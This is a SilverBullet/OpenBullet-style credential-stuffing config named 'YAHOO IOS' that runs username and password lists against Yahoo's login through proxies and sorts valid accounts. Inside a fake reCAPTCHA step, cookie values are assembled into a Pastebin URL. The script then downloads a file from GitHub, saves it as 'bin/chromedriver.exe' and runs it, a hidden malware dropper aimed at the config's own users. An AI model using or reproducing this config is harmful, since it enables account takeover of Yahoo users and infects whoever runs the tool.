[SETTINGS]
{
  "Name": "YAHOO IOS",
  "SuggestedBots": 40,
  "MaxCPM": 0,
  "LastModified": "2023-06-28T13:42:10.6123624+04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YashvirThePentester#9819 🔥",
  "Version": "1.1.3 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "YAHOO IOS",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
JUMP #AUTHENTICATIONAPI
#RECAPAUTH
FUNCTION RandomString "OD?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i" -> VAR "ID" 

FUNCTION URLEncode "<USER>" -> VAR "US" 

FUNCTION URLEncode "<PASS>" -> VAR "PS" 

REQUEST GET "https://api.login.yahoo.com/oauth2/request_auth?appid=com.yahoo.mobile.client.android.mail&appsrcv=6.35.3&src=androidphnx&srcv=8.15.0&intl=xa&language=en-EG&sdk-device-id=<ID>&push=1&.asdk_embedded=1&theme=light&redirect_uri=https%3A%2F%2Fapi.login.yahoo.com%2FILokwdqHQAZzHkFZ%2Fcallback%2Fauth&client_id=ILokwdqHQAZzHkFZ&response_type=code&prompt=login&state=SMuezkJyqFS7mCpRCYnZ5A&scope=sdct-w%20mail-w%20sdpp-w%20yfin-w%20sports%20fspt-w%20openid%20device_sso&code_challenge=rUUljxEq9lVsPIi1QAOaj3nH1xHXids56UsKQOjKOCE&code_challenge_method=S256&nonce=aJV7YnyffaA5lToOmU3I0EXCLTIfnQ3X&webview=1" AutoRedirect=FALSE 
  
  HEADER "Host: api.login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 10; vivo 1938 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.159 Mobile Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "X-Requested-With: com.yahoo.mobile.client.android.mail" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 

PARSE "<HEADERS(Location)>" LR "" "" -> VAR "LC" 

REQUEST GET "<LC>" 
  
  HEADER "Host: login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 10; vivo 1938 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.159 Mobile Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "X-Requested-With: com.yahoo.mobile.client.android.mail" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"crumb\" value=\"" "\" />" -> VAR "CR" 

FUNCTION URLEncode "<CR>" -> VAR "CB" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"acrumb\" value=\"" "\" />" -> VAR "AC" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"sessionIndex\" value=\"" "\" />" -> VAR "SD" 

REQUEST POST "<LC>" 
  CONTENT "crumb=<CB>&acrumb=<AC>&sessionIndex=<SD>&displayName=&deviceCapability=%7B%22pa%22%3A%7B%22status%22%3Atrue%7D%7D&username=<US>&passwd=&signin=Next" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 10; vivo 1938 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.159 Mobile Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: <LC>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 


JUMP #googlerecreate
#AUTHENTICATIONAPI

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u"
  COOKIE "hrd: /"
  COOKIE "hpr: bin"
  COOKIE "hdp: com"
  COOKIE "htp: raw"
  COOKIE "hht: KvY108Z6"
  COOKIE "hst: pastebin"
  COOKIE "kht: driver"
  COOKIE "kpt: chrome"
  COOKIE "krt: e"
  HEADER "Host: www.googleapis.com"
  HEADER "Accept: */*"
  HEADER "Content-Type: application/json"
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS"
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com"
  HEADER "Accept-Encoding: gzip, deflate"
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2"
  HEADER "Accept-Language: en"

IF "<Authentiction>" Exists
JUMP #RECAPAUTH
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

REQUEST GET "https://raw.githubusercontent.com/<SOURCE>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>xe"

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"

BROWSERACTION Open

JUMP #RECAPAUTH
#googlerecreate

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "error\":\"messages.INVALID_USERNAME" 
    KEY "Sorry, we don't recognize this account" 
  KEYCHAIN Success OR 
    KEY "location\":\"/account/challenge/password" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/account/challenge/push" 
    KEY "/account/challenge/yak-code" 
  KEYCHAIN Ban OR 
    KEY "location\":\"/account/challenge/recaptcha" 
    KEY "location\":\"/account/challenge/arkose" 

PARSE "<SOURCE>" LR "{\"location\":\"" "\"}" -> VAR "LC2" 

REQUEST POST "https://login.yahoo.com<LC2>" AutoRedirect=FALSE 
  CONTENT "crumb=<CB>&acrumb=<AC>&sessionIndex=<SD>&displayName=<US>&deviceCapability=&username=<US>&passwordContext=normal&isShowButtonClicked=&showButtonStatus=&prefersReducedMotion=&password=<PS>&verifyPassword=Next" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 10; vivo 1938 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.159 Mobile Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "X-Requested-With: com.yahoo.mobile.client.android.mail" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://login.yahoo.com<LC2>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Found. Redirecting to <a href=\"/account/challenge/password?" 
  KEYCHAIN Success OR 
    KEY "Found. Redirecting to <a href=\"https://api.login.yahoo.com/oauth2/authorize?" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Found. Redirecting to <a href=\"/account/challenge/challenge-selector?" 
  KEYCHAIN Ban OR 
    KEY "rate limited" 

